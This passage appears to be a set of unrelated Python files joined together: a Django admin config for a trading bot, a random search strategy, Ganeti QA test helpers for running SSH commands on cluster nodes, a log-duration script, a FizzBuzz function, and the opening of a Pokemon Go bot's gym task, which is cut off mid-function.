"price",
"errors",
)
list_filter = ["bot", "timestamp", "status", "side"]
search_fields = [
"bot",
"order_id",
"timestamp",
"status",
"order_type",
"side",
"price",
"amount",
"filled",
]
# inlines = [TradeInline]
inlines = [ErrorInline]
class TradeAdmin(admin.ModelAdmin):
fieldsets = [
(
None,
{
"fields": [
"order",
"trade_id",
"timestamp",
"taker_or_maker",
"amount",
"fee_currency",
"fee_cost",
"fee_rate",
]
},
),
]
list_display = (
"order",
"trade_id",
"timestamp",
"taker_or_maker",
"amount",
"fee_rate",
)
list_filter = ["taker_or_maker", "timestamp"]
search_fields = [
"order",
"trade_id",
"timestamp",
"taker_or_maker",
"amount",
"fee_currency",
"fee_cost",
"fee_rate",
]
class OHLCVAdmin(admin.ModelAdmin):
fieldsets = [
(
None,
{
"fields": [
"market",
"timeframe",
"timestamp",
"open_price",
"highest_price",
"lowest_price",
"closing_price",
"volume",
]
},
),
]
list_display = (
"market",
"timeframe",
"timestamp",
"open_price",
"highest_price",
"lowest_price",
"closing_price",
"volume",
)
list_filter = ["market", "timeframe", "timestamp"]
search_fields = [
"market",
"timeframe",
"timestamp",
"open_price",
"highest_price",
"lowest_price",
"closing_price",
"volume",
]
admin.site.register(Account, AccountAdmin)
admin.site.register(Bot, BotAdmin)
admin.site.register(Currency, CurrencyAdmin)
admin.site.register(Market, MarketAdmin)
admin.site.register(Order, OrderAdmin)
admin.site.register(Trade, TradeAdmin)
admin.site.register(OHLCV, OHLCVAdmin)
|
import logging
import random
import time
from .. import Sampler, submit_models, query_available_resources
from .strategy import BaseStrategy
_logger = logging.getLogger(__name__)
class RandomSampler(Sampler):
def choice(self, candidates, mutator, model, index):
return random.choice(candidates)
class RandomStrategy(BaseStrategy):
def __init__(self):
self.random_sampler = RandomSampler()
def run(self, base_model, applied_mutators):
_logger.info('stargety start...')
while True:
avail_resource = query_available_resources()
if avail_resource > 0:
model = base_model
_logger.info('apply mutators...')
_logger.info('mutators: %s', str(applied_mutators))
for mutator in applied_mutators:
mutator.bind_sampler(self.random_sampler)
model = mutator.apply(model)
# run models
submit_models(model)
else:
time.sleep(2)
|
#
#
# Copyright (C) 2007, 2011, 2012, 2013 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Utilities for QA tests.
"""
import copy
import datetime
import operator
import os
import random
import re
import socket
import subprocess
import sys
import tempfile
import yaml
try:
import functools
except ImportError, err:
raise ImportError("Python 2.5 or higher is required: %s" % err)
from ganeti import utils
from ganeti import compat
from ganeti import constants
from ganeti import ht
from ganeti import pathutils
from ganeti import vcluster
import colors
import qa_config
import qa_error
from qa_logging import FormatInfo
_MULTIPLEXERS = {}
#: Unique ID per QA run
_RUN_UUID = utils.NewUUID()
#: Path to the QA query output log file
_QA_OUTPUT = pathutils.GetLogFilename("qa-output")
_RETRIES = 3
(INST_DOWN,
INST_UP) = range(500, 502)
(FIRST_ARG,
RETURN_VALUE) = range(1000, 1002)
def _RaiseWithInfo(msg, error_desc):
"""Raises a QA error with the given content, and adds a message if present.
"""
if msg:
output = "%s: %s" % (msg, error_desc)
else:
output = error_desc
raise qa_error.Error(output)
def AssertIn(item, sequence, msg=None):
"""Raises an error when item is not in sequence.
"""
if item not in sequence:
_RaiseWithInfo(msg, "%r not in %r" % (item, sequence))
def AssertNotIn(item, sequence, msg=None):
"""Raises an error when item is in sequence.
"""
if item in sequence:
_RaiseWithInfo(msg, "%r in %r" % (item, sequence))
def AssertEqual(first, second, msg=None):
"""Raises an error when values aren't equal.
"""
if not first == second:
_RaiseWithInfo(msg, "%r == %r" % (first, second))
def AssertMatch(string, pattern, msg=None):
"""Raises an error when string doesn't match regexp pattern.
"""
if not re.match(pattern, string):
_RaiseWithInfo(msg, "%r doesn't match /%r/" % (string, pattern))
def _GetName(entity, fn):
"""Tries to get name of an entity.
@type entity: string or dict
@param fn: Function retrieving name from entity
"""
if isinstance(entity, basestring):
result = entity
else:
result = fn(entity)
if not ht.TNonEmptyString(result):
raise Exception("Invalid name '%s'" % result)
return result
def _AssertRetCode(rcode, fail, cmdstr, nodename):
"""Check the return value from a command and possibly raise an exception.
"""
if fail and rcode == 0:
raise qa_error.Error("Command '%s' on node %s was expected to fail but"
" didn't" % (cmdstr, nodename))
elif not fail and rcode != 0:
raise qa_error.Error("Command '%s' on node %s failed, exit code %s" %
(cmdstr, nodename, rcode))
def AssertCommand(cmd, fail=False, node=None, log_cmd=True, max_seconds=None):
"""Checks that a remote command succeeds.
@param cmd: either a string (the command to execute) or a list (to
be converted using L{utils.ShellQuoteArgs} into a string)
@type fail: boolean or None
@param fail: if the command is expected to fail instead of succeeding,
or None if we don't care
@param node: if passed, it should be the node on which the command
should be executed, instead of the master node (can be either a
dict or a string)
@param log_cmd: if False, the command won't be logged (simply passed to
StartSSH)
@type max_seconds: double
@param max_seconds: fail if the command takes more than C{max_seconds}
seconds
@return: the return code, stdout and stderr of the command
@raise qa_error.Error: if the command fails when it shouldn't or vice versa
"""
if node is None:
node = qa_config.GetMasterNode()
nodename = _GetName(node, operator.attrgetter("primary"))
if isinstance(cmd, basestring):
cmdstr = cmd
else:
cmdstr = utils.ShellQuoteArgs(cmd)
start = datetime.datetime.now()
popen = StartSSH(nodename, cmdstr, log_cmd=log_cmd)
# Run the command
stdout, stderr = popen.communicate()
rcode = popen.returncode
duration_seconds = TimedeltaToTotalSeconds(datetime.datetime.now() - start)
if fail is not None:
try:
_AssertRetCode(rcode, fail, cmdstr, nodename)
except:
print "Stdout was:\n%s\nStderr was:\n%s\n" % (stdout, stderr)
raise
if max_seconds is not None:
if duration_seconds > max_seconds:
raise qa_error.Error(
"Cmd '%s' took %f seconds, maximum of %f was exceeded" %
(cmdstr, duration_seconds, max_seconds))
return rcode, stdout, stderr
def AssertRedirectedCommand(cmd, fail=False, node=None, log_cmd=True):
"""Executes a command with redirected output.
The log will go to the qa-output log file in the ganeti log
directory on the node where the command is executed. The fail and
node parameters are passed unchanged to AssertCommand.
@param cmd: the command to be executed, as a list; a string is not
supported
"""
if not isinstance(cmd, list):
raise qa_error.Error("Non-list passed to AssertRedirectedCommand")
ofile = utils.ShellQuote(_QA_OUTPUT)
cmdstr = utils.ShellQuoteArgs(cmd)
AssertCommand("echo ---- $(date) %s ---- >> %s" % (cmdstr, ofile),
fail=False, node=node, log_cmd=False)
return AssertCommand(cmdstr + " >> %s" % ofile,
fail=fail, node=node, log_cmd=log_cmd)
def GetSSHCommand(node, cmd, strict=True, opts=None, tty=False,
use_multiplexer=True):
"""Builds SSH command to be executed.
@type node: string
@param node: node the command should run on
@type cmd: string
@param cmd: command to be executed in the node; if None or empty
string, no command will be executed
@type strict: boolean
@param strict: whether to enable strict host key checking
@type opts: list
@param opts: list of additional options
@type tty: boolean or None
@param tty: if we should use tty; if None, will be auto-detected
@type use_multiplexer: boolean
@param use_multiplexer: if the multiplexer for the node should be used
"""
args = ["ssh", "-oEscapeChar=none", "-oBatchMode=yes", "-lroot"]
if tty is None:
tty = sys.stdout.isatty()
if tty:
args.append("-t")
args.append("-oStrictHostKeyChecking=%s" % ("yes" if strict else "no", ))
args.append("-oClearAllForwardings=yes")
args.append("-oForwardAgent=yes")
if opts:
args.extend(opts)
if node in _MULTIPLEXERS and use_multiplexer:
spath = _MULTIPLEXERS[node][0]
args.append("-oControlPath=%s" % spath)
args.append("-oControlMaster=no")
(vcluster_master, vcluster_basedir) = \
qa_config.GetVclusterSettings()
if vcluster_master:
args.append(vcluster_master)
args.append("%s/%s/cmd" % (vcluster_basedir, node))
if cmd:
# For virtual clusters the whole command must be wrapped using the "cmd"
# script, as that script sets a number of environment variables. If the
# command contains shell meta characters the whole command needs to be
# quoted.
args.append(utils.ShellQuote(cmd))
else:
args.append(node)
if cmd:
args.append(cmd)
return args
def StartLocalCommand(cmd, _nolog_opts=False, log_cmd=True, **kwargs):
"""Starts a local command.
"""
if log_cmd:
if _nolog_opts:
pcmd = [i for i in cmd if not i.startswith("-")]
else:
pcmd = cmd
print "%s %s" % (colors.colorize("Command:", colors.CYAN),
utils.ShellQuoteArgs(pcmd))
return subprocess.Popen(cmd, shell=False, **kwargs)
def StartSSH(node, cmd, strict=True, log_cmd=True):
"""Starts SSH.
"""
return StartLocalCommand(GetSSHCommand(node, cmd, strict=strict),
_nolog_opts=True, log_cmd=log_cmd,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def StartMultiplexer(node):
"""Starts a multiplexer command.
@param node: the node for which to open the multiplexer
"""
if node in _MULTIPLEXERS:
return
# Note: yes, we only need mktemp, since we'll remove the file anyway
sname = tempfile.mktemp(prefix="ganeti-qa-multiplexer.")
utils.RemoveFile(sname)
opts = ["-N", "-oControlPath=%s" % sname, "-oControlMaster=yes"]
print "Created socket at %s" % sname
child = StartLocalCommand(GetSSHCommand(node, None, opts=opts))
_MULTIPLEXERS[node] = (sname, child)
def CloseMultiplexers():
"""Closes all current multiplexers and cleans up.
"""
for node in _MULTIPLEXERS.keys():
(sname, child) = _MULTIPLEXERS.pop(node)
utils.KillProcess(child.pid, timeout=10, waitpid=True)
utils.RemoveFile(sname)
def _GetCommandStdout(proc):
"""Extract the stored standard error, print it and return it.
"""
out = proc.stdout.read()
sys.stdout.write(out)
return out
def _NoTimeout(state):
"""False iff the command timed out."""
rcode, out = state
return rcode == 0 or not ('TimeoutError' in out or 'timed out' in out)
def GetCommandOutput(node, cmd, tty=False, use_multiplexer=True, log_cmd=True,
fail=False):
"""Returns the output of a command executed on the given node.
@type node: string
@param node: node the command should run on
@type cmd: string
@param cmd: command to be executed in the node (cannot be empty or None)
@type tty: bool or None
@param tty: if we should use tty; if None, it will be auto-detected
@type use_multiplexer: bool
@param use_multiplexer: if the SSH multiplexer provided by the QA should be
used or not
@type log_cmd: bool
@param log_cmd: if the command should be logged
@type fail: bool
@param fail: whether the command is expected to fail
"""
assert cmd
def CallCommand():
command = GetSSHCommand(node, cmd, tty=tty,
use_multiplexer=use_multiplexer)
p = StartLocalCommand(command, stdout=subprocess.PIPE, log_cmd=log_cmd)
rcode = p.wait()
out = _GetCommandStdout(p)
return rcode, out
# TODO: make retries configurable
rcode, out = utils.CountRetry(_NoTimeout, CallCommand, _RETRIES)
_AssertRetCode(rcode, fail, cmd, node)
return out
def GetObjectInfo(infocmd):
"""Get and parse information about a Ganeti object.
@type infocmd: list of strings
@param infocmd: command to be executed, e.g. ["gnt-cluster", "info"]
@return: the information parsed, appropriately stored in dictionaries,
lists...
"""
master = qa_config.GetMasterNode()
cmdline = utils.ShellQuoteArgs(infocmd)
info_out = GetCommandOutput(master.primary, cmdline)
return yaml.load(info_out)
def UploadFile(node, src):
"""Uploads a file to a node and returns the filename.
Caller needs to remove the returned file on the node when it's not needed
anymore.
"""
# Make sure nobody else has access to it while preserving local permissions
mode = os.stat(src).st_mode & 0700
cmd = ('tmp=$(mktemp --tmpdir gnt.XXXXXX) && '
'chmod %o "${tmp}" && '
'[[ -f "${tmp}" ]] && '
'cat > "${tmp}" && '
'echo "${tmp}"') % mode
f = open(src, "r")
try:
p = subprocess.Popen(GetSSHCommand(node, cmd), shell=False, stdin=f,
stdout=subprocess.PIPE)
AssertEqual(p.wait(), 0)
# Return temporary filename
return _GetCommandStdout(p).strip()
finally:
f.close()
def UploadData(node, data, mode=0600, filename=None):
"""Uploads data to a node and returns the filename.
Caller needs to remove the returned file on the node when it's not needed
anymore.
"""
if filename:
tmp = "tmp=%s" % utils.ShellQuote(filename)
else:
tmp = ('tmp=$(mktemp --tmpdir gnt.XXXXXX) && '
'chmod %o "${tmp}"') % mode
cmd = ("%s && "
"[[ -f \"${tmp}\" ]] && "
"cat > \"${tmp}\" && "
"echo \"${tmp}\"") % tmp
p = subprocess.Popen(GetSSHCommand(node, cmd), shell=False,
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
p.stdin.write(data)
p.stdin.close()
AssertEqual(p.wait(), 0)
# Return temporary filename
return _GetCommandStdout(p).strip()
def BackupFile(node, path):
"""Creates a backup of a file on the node and returns the filename.
Caller needs to remove the returned file on the node when it's not needed
anymore.
"""
vpath = MakeNodePath(node, path)
cmd = ("tmp=$(mktemp .gnt.XXXXXX --tmpdir=$(dirname %s)) && "
"[[ -f \"$tmp\" ]] && "
"cp %s $tmp && "
"echo $tmp") % (utils.ShellQuote(vpath), utils.ShellQuote(vpath))
# Return temporary filename
result = GetCommandOutput(node, cmd).strip()
print "Backup filename: %s" % result
return result
def ResolveInstanceName(instance):
"""Gets the full name of an instance.
@type instance: string
@param instance: Instance name
"""
info = GetObjectInfo(["gnt-instance", "info", instance])
return info[0]["Instance name"]
def ResolveNodeName(node):
"""Gets the full name of a node.
"""
info = GetObjectInfo(["gnt-node", "info", node.primary])
return info[0]["Node name"]
def GetNodeInstances(node, secondaries=False):
"""Gets a list of instances on a node.
"""
master = qa_config.GetMasterNode()
node_name = ResolveNodeName(node)
# Get list of all instances
cmd = ["gnt-instance", "list", "--separator=:", "--no-headers",
"--output=name,pnode,snodes"]
output = GetCommandOutput(master.primary, utils.ShellQuoteArgs(cmd))
instances = []
for line in output.splitlines():
(name, pnode, snodes) = line.split(":", 2)
if ((not secondaries and pnode == node_name) or
(secondaries and node_name in snodes.split(","))):
instances.append(name)
return instances
def _SelectQueryFields(rnd, fields):
"""Generates a list of fields for query tests.
"""
# Create copy for shuffling
fields = list(fields)
rnd.shuffle(fields)
# Check all fields
yield fields
yield sorted(fields)
# Duplicate fields
yield fields + fields
# Check small groups of fields
while fields:
yield [fields.pop() for _ in range(rnd.randint(2, 10)) if fields]
def _List(listcmd, fields, names):
"""Runs a list command.
"""
master = qa_config.GetMasterNode()
cmd = [listcmd, "list", "--separator=|", "--no-headers",
"--output", ",".join(fields)]
if names:
cmd.extend(names)
return GetCommandOutput(master.primary,
utils.ShellQuoteArgs(cmd)).splitlines()
def GenericQueryTest(cmd, fields, namefield="name", test_unknown=True):
"""Runs a number of tests on query commands.
@param cmd: Command name
@param fields: List of field names
"""
rnd = random.Random(hash(cmd))
fields = list(fields)
rnd.shuffle(fields)
# Test a number of field combinations
for testfields in _SelectQueryFields(rnd, fields):
AssertRedirectedCommand([cmd, "list", "--output", ",".join(testfields)])
if namefield is not None:
namelist_fn = compat.partial(_List, cmd, [namefield])
# When no names were requested, the list must be sorted
names = namelist_fn(None)
AssertEqual(names, utils.NiceSort(names))
# When requesting specific names, the order must be kept
revnames = list(reversed(names))
AssertEqual(namelist_fn(revnames), revnames)
randnames = list(names)
rnd.shuffle(randnames)
AssertEqual(namelist_fn(randnames), randnames)
if test_unknown:
# Listing unknown items must fail
AssertCommand([cmd, "list", "this.name.certainly.does.not.exist"],
fail=True)
# Check exit code for listing unknown field
rcode, _, _ = AssertRedirectedCommand([cmd, "list",
"--output=field/does/not/exist"],
fail=True)
AssertEqual(rcode, constants.EXIT_UNKNOWN_FIELD)
def GenericQueryFieldsTest(cmd, fields):
master = qa_config.GetMasterNode()
# Listing fields
AssertRedirectedCommand([cmd, "list-fields"])
AssertRedirectedCommand([cmd, "list-fields"] + fields)
# Check listed fields (all, must be sorted)
realcmd = [cmd, "list-fields", "--separator=|", "--no-headers"]
output = GetCommandOutput(master.primary,
utils.ShellQuoteArgs(realcmd)).splitlines()
AssertEqual([line.split("|", 1)[0] for line in output],
utils.NiceSort(fields))
# Check exit code for listing unknown field
rcode, _, _ = AssertCommand([cmd, "list-fields", "field/does/not/exist"],
fail=True)
AssertEqual(rcode, constants.EXIT_UNKNOWN_FIELD)
def AddToEtcHosts(hostnames):
"""Adds hostnames to /etc/hosts.
@param hostnames: List of hostnames first used A records, all other CNAMEs
"""
master = qa_config.GetMasterNode()
tmp_hosts = UploadData(master.primary, "", mode=0644)
data = []
for localhost in ("::1", "127.0.0.1"):
data.append("%s %s" % (localhost, " ".join(hostnames)))
try:
AssertCommand("{ cat %s && echo -e '%s'; } > %s && mv %s %s" %
(utils.ShellQuote(pathutils.ETC_HOSTS),
"\\n".join(data),
utils.ShellQuote(tmp_hosts),
utils.ShellQuote(tmp_hosts),
utils.ShellQuote(pathutils.ETC_HOSTS)))
except Exception:
AssertCommand(["rm", "-f", tmp_hosts])
raise
def RemoveFromEtcHosts(hostnames):
"""Remove hostnames from /etc/hosts.
@param hostnames: List of hostnames first used A records, all other CNAMEs
"""
master = qa_config.GetMasterNode()
tmp_hosts = UploadData(master.primary, "", mode=0644)
quoted_tmp_hosts = utils.ShellQuote(tmp_hosts)
sed_data = " ".join(hostnames)
try:
AssertCommand((r"sed -e '/^\(::1\|127\.0\.0\.1\)\s\+%s/d' %s > %s"
r" && mv %s %s") %
(sed_data, utils.ShellQuote(pathutils.ETC_HOSTS),
quoted_tmp_hosts, quoted_tmp_hosts,
utils.ShellQuote(pathutils.ETC_HOSTS)))
except Exception:
AssertCommand(["rm", "-f", tmp_hosts])
raise
def RunInstanceCheck(instance, running):
"""Check if instance is running or not.
"""
instance_name = _GetName(instance, operator.attrgetter("name"))
script = qa_config.GetInstanceCheckScript()
if not script:
return
master_node = qa_config.GetMasterNode()
# Build command to connect to master node
master_ssh = GetSSHCommand(master_node.primary, "--")
if running:
running_shellval = "1"
running_text = ""
else:
running_shellval = ""
running_text = "not "
print FormatInfo("Checking if instance '%s' is %srunning" %
(instance_name, running_text))
args = [script, instance_name]
env = {
"PATH": constants.HOOKS_PATH,
"RUN_UUID": _RUN_UUID,
"MASTER_SSH": utils.ShellQuoteArgs(master_ssh),
"INSTANCE_NAME": instance_name,
"INSTANCE_RUNNING": running_shellval,
}
result = os.spawnve(os.P_WAIT, script, args, env)
if result != 0:
raise qa_error.Error("Instance check failed with result %s" % result)
def _InstanceCheckInner(expected, instarg, args, result):
"""Helper function used by L{InstanceCheck}.
"""
if instarg == FIRST_ARG:
instance = args[0]
elif instarg == RETURN_VALUE:
instance = result
else:
raise Exception("Invalid value '%s' for instance argument" % instarg)
if expected in (INST_DOWN, INST_UP):
RunInstanceCheck(instance, (expected == INST_UP))
elif expected is not None:
raise Exception("Invalid value '%s'" % expected)
def InstanceCheck(before, after, instarg):
"""Decorator to check instance status before and after test.
@param before: L{INST_DOWN} if instance must be stopped before test,
L{INST_UP} if instance must be running before test, L{None} to not check.
@param after: L{INST_DOWN} if instance must be stopped after test,
L{INST_UP} if instance must be running after test, L{None} to not check.
@param instarg: L{FIRST_ARG} to use first argument to test as instance (a
dictionary), L{RETURN_VALUE} to use return value (disallows pre-checks)
"""
def decorator(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
_InstanceCheckInner(before, instarg, args, NotImplemented)
result = fn(*args, **kwargs)
_InstanceCheckInner(after, instarg, args, result)
return result
return wrapper
return decorator
def GetNonexistentGroups(count):
"""Gets group names which shouldn't exist on the cluster.
@param count: Number of groups to get
@rtype: integer
"""
return GetNonexistentEntityNames(count, "groups", "group")
def GetNonexistentEntityNames(count, name_config, name_prefix):
"""Gets entity names which shouldn't exist on the cluster.
The actualy names can refer to arbitrary entities (for example
groups, networks).
@param count: Number of names to get
@rtype: integer
@param name_config: name of the leaf in the config containing
this entity's configuration, including a 'inexistent-'
element
@rtype: string
@param name_prefix: prefix of the entity's names, used to compose
the default values; for example for groups, the prefix is
'group' and the generated names are then group1, group2, ...
@rtype: string
"""
entities = qa_config.get(name_config, {})
default = [name_prefix + str(i) for i in range(count)]
assert count <= len(default)
name_config_inexistent = "inexistent-" + name_config
candidates = entities.get(name_config_inexistent, default)[:count]
if len(candidates) < count:
raise Exception("At least %s non-existent %s are needed" %
(count, name_config))
return candidates
def MakeNodePath(node, path):
"""Builds an absolute path for a virtual node.
@type node: string or L{qa_config._QaNode}
@param node: Node
@type path: string
@param path: Path without node-specific prefix
"""
(_, basedir) = qa_config.GetVclusterSettings()
if isinstance(node, basestring):
name = node
else:
name = node.primary
if basedir:
assert path.startswith("/")
return "%s%s" % (vcluster.MakeNodeRoot(basedir, name), path)
else:
return path
def _GetParameterOptions(specs):
"""Helper to build policy options."""
values = ["%s=%s" % (par, val)
for (par, val) in specs.items()]
return ",".join(values)
def TestSetISpecs(new_specs=None, diff_specs=None, get_policy_fn=None,
build_cmd_fn=None, fail=False, old_values=None):
"""Change instance specs for an object.
At most one of new_specs or diff_specs can be specified.
@type new_specs: dict
@param new_specs: new complete specs, in the same format returned by
L{ParseIPolicy}.
@type diff_specs: dict
@param diff_specs: partial specs, it can be an incomplete specifications, but
if min/max specs are specified, their number must match the number of the
existing specs
@type get_policy_fn: function
@param get_policy_fn: function that returns the current policy as in
L{ParseIPolicy}
@type build_cmd_fn: function
@param build_cmd_fn: function that return the full command line from the
options alone
@type fail: bool
@param fail: if the change is expected to fail
@type old_values: tuple
@param old_values: (old_policy, old_specs), as returned by
L{ParseIPolicy}
@return: same as L{ParseIPolicy}
"""
assert get_policy_fn is not None
assert build_cmd_fn is not None
assert new_specs is None or diff_specs is None
if old_values:
(old_policy, old_specs) = old_values
else:
(old_policy, old_specs) = get_policy_fn()
if diff_specs:
new_specs = copy.deepcopy(old_specs)
if constants.ISPECS_MINMAX in diff_specs:
AssertEqual(len(new_specs[constants.ISPECS_MINMAX]),
len(diff_specs[constants.ISPECS_MINMAX]))
for (new_minmax, diff_minmax) in zip(new_specs[constants.ISPECS_MINMAX],
diff_specs[constants.ISPECS_MINMAX]):
for (key, parvals) in diff_minmax.items():
for (par, val) in parvals.items():
new_minmax[key][par] = val
for (par, val) in diff_specs.get(constants.ISPECS_STD, {}).items():
new_specs[constants.ISPECS_STD][par] = val
if new_specs:
cmd = []
if (diff_specs is None or constants.ISPECS_MINMAX in diff_specs):
minmax_opt_items = []
for minmax in new_specs[constants.ISPECS_MINMAX]:
minmax_opts = []
for key in ["min", "max"]:
keyopt = _GetParameterOptions(minmax[key])
minmax_opts.append("%s:%s" % (key, keyopt))
minmax_opt_items.append("/".join(minmax_opts))
cmd.extend([
"--ipolicy-bounds-specs",
"//".join(minmax_opt_items)
])
if diff_specs is None:
std_source = new_specs
else:
std_source = diff_specs
std_opt = _GetParameterOptions(std_source.get("std", {}))
if std_opt:
cmd.extend(["--ipolicy-std-specs", std_opt])
AssertCommand(build_cmd_fn(cmd), fail=fail)
# Check the new state
(eff_policy, eff_specs) = get_policy_fn()
AssertEqual(eff_policy, old_policy)
if fail:
AssertEqual(eff_specs, old_specs)
else:
AssertEqual(eff_specs, new_specs)
else:
(eff_policy, eff_specs) = (old_policy, old_specs)
return (eff_policy, eff_specs)
def ParseIPolicy(policy):
"""Parse and split instance an instance policy.
@type policy: dict
@param policy: policy, as returned by L{GetObjectInfo}
@rtype: tuple
@return: (policy, specs), where:
- policy is a dictionary of the policy values, instance specs excluded
- specs is a dictionary containing only the specs, using the internal
format (see L{constants.IPOLICY_DEFAULTS} for an example)
"""
ret_specs = {}
ret_policy = {}
for (key, val) in policy.items():
if key == "bounds specs":
ret_specs[constants.ISPECS_MINMAX] = []
for minmax in val:
ret_minmax = {}
for key in minmax:
keyparts = key.split("/", 1)
assert len(keyparts) > 1
ret_minmax[keyparts[0]] = minmax[key]
ret_specs[constants.ISPECS_MINMAX].append(ret_minmax)
elif key == constants.ISPECS_STD:
ret_specs[key] = val
else:
ret_policy[key] = val
return (ret_policy, ret_specs)
def UsesIPv6Connection(host, port):
"""Returns True if the connection to a given host/port could go through IPv6.
"""
return any(t[0] == socket.AF_INET6 for t in socket.getaddrinfo(host, port))
def TimedeltaToTotalSeconds(td):
"""Returns the total seconds in a C{datetime.timedelta} object.
This performs the same task as the C{datetime.timedelta.total_seconds()}
method which is present in Python 2.7 onwards.
@type td: datetime.timedelta
@param td: timedelta object to convert
@rtype float
@return: total seconds in the timedelta object
"""
return ((td.microseconds + (td.seconds + td.days * 24.0 * 3600.0) * 10 ** 6) /
10 ** 6)
|
import sys, os.path
from datetime import datetime, timedelta
if len(sys.argv) < 2:
print(f'usage: {sys.argv[0]} [log_files]')
sys.exit()
last_line = None
start_datetime = None
duration = timedelta(0)
for log_file in sys.argv[1:]:
with open(log_file) as f:
lines = f.readlines()
for line in lines:
if last_line is None:
start_datetime = datetime.strptime(line[:-1], '%a %b %d %H:%M:%S %Z %Y')
last_line = line
stop_datetime = datetime.strptime(last_line[:-1], '%a %b %d %H:%M:%S %Z %Y')
duration += stop_datetime - start_datetime
print(f'Total duration: {duration.total_seconds()/3600:g} hours')
|
def checkio(number: int) -> str:
result = []
if (number % 3) == 0:
result.append("Fizz")
if (number % 5) == 0:
result.append("Buzz")
if not result:
result.append(str(number))
return " ".join(result)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
from datetime import datetime, timedelta
import sys
import time
import random
from random import uniform
from collections import Counter
from pgoapi.utilities import f2i
from pokemongo_bot import inventory
from pokemongo_bot.inventory import player
from pokemongo_bot.constants import Constants
from pokemongo_bot.human_behaviour import action_delay, sleep
from pokemongo_bot.worker_result import WorkerResult
from pokemongo_bot.base_task import BaseTask
from pokemongo_bot import inventory
from .utils import distance, format_time, fort_details, format_dist
from pokemongo_bot.tree_config_builder import ConfigException
from pokemongo_bot.walkers.walker_factory import walker_factory
from pokemongo_bot.inventory import Pokemons
from sys import stdout
GYM_DETAIL_RESULT_SUCCESS = 1
GYM_DETAIL_RESULT_OUT_OF_RANGE = 2
GYM_DETAIL_RESULT_UNSET = 0
TEAM_NOT_SET = 0
TEAM_BLUE = 1
TEAM_RED = 2
TEAM_YELLOW = 3
TEAMS = {
0: "Not Set",
1: "Mystic",
2: "Valor",
3: "Instinct"
}
ITEM_RAZZBERRY = 701
ITEM_NANABBERRY = 703
ITEM_PINAPBERRY = 705
class GymPokemon(BaseTask):
SUPPORTED_TASK_API_VERSION = 1
def __init__(self, bot, config):
super(GymPokemon, self).__init__(bot, config)
def initialize(self):
# 10 seconds from current time
self.next_update = datetime.now() + timedelta(0, 10)
self.order_by = self.config.get('order_by', 'cp')
self.enabled = self.config.get('enabled', False)
self.min_interval = self.config.get('min_interval', 360)
self.min_recheck = self.config.get('min_recheck', 30)
self.max_recheck = self.config.get('max_recheck', 120)
self.take_at_most = self.config.get('take_at_most', 20)
if self.take_at_most > 20:
self.logger.warning("We can take more than 20 gyms!")
self.take_at_most = 20
self.leave_at_least_spots = self.config.get('leave_at_least_spots', 0)
if self.leave_at_least_spots > 4:
self.logger.warning("There are only 6 spots in a gym, when we drop a Pokemon in that would leave 5 spots! Setting leave open spots to 4!")
self.leave_at_least_spots = 4
self.chain_fill_gyms = self.config.get('chain_fill_gyms', True)
self.ignore_max_cp_pokemon = self.config.get('allow_above_cp', ["Blissey"])
self.never_place = self.config.get('never_place', [])
self.pick_random_pokemon = self.config.get('pick_random_pokemon', True)
self.can_be_disabled_by_catch_limter = self.config.get("can_be_disabled_by_catch_limter", False)
self.recheck = datetime.now()
self.walker = self.config.get('walker', 'StepWalker')
self.destination = None
self.recent_gyms = []
self.pokemons = []
self.fort_pokemons = []
self.expire_recent = 10
self.next_expire = None
self.dropped_gyms = []
self.blacklist= []
self.check_interval = 0
self.gyms = []
self.raid_gyms = dict()
self.bot.event_manager.register_event('gym_error')
self.bot.event_manager.register_event('fed_pokemon')
self.bot.event_manager.register_event('gym_full')
self.bot.event_manager.register_event('deployed_pokemon')
#self.logger.info("player_date %s." % self.bot.player_data)
try:
self.team = self.bot.player_data['team']
except KeyError:
self.team = TEAM_NOT_SET
if self.enabled:
self.emit_event(
'gym_error',
formatted="You have no team selected, so the module GymPokemon should be disabled"
)
def should_run(self):
# Check if we have any Pokemons and are level > 5 and have selected a team
return player()._level >= 5 and len(self.pokemons) > 0 and self.team > TEAM_NOT_SET
def display_fort_pokemon(self):
if len(self.fort_pokemons) == 0:
return
self.logger.info("We currently have %s Pokemon in Gym(s):" % len(self.fort_pokemons) )
for pokemon in self.fort_pokemons:
lat = self.bot.position[0:2][0]
lng = self.bot.position[0:2][1]
self.logger.info("%s (%s CP)" % (pokemon.name, pokemon.cp))
def work(self):
if not self.enabled:
return WorkerResult.SUCCESS
if self.bot.catch_disabled and self.can_be_disabled_by_catch_limter:
# When catching is disabled, drop the target.
if self.destination is not None:
self.destination = None
if not hasattr(self.bot, "gym_pokemon_disabled_global_warning") or \
(hasattr(self.bot, "gym_pokemon_disabled_global_warning") and not self.bot.gym_pokemon_disabled_global_warning):
self.logger.info("All gym tasks are currently disabled until {}. Gym function will resume when catching tasks are re-enabled".format(self.bot.catch_resume_at.strftime("%H:%M:%S")))
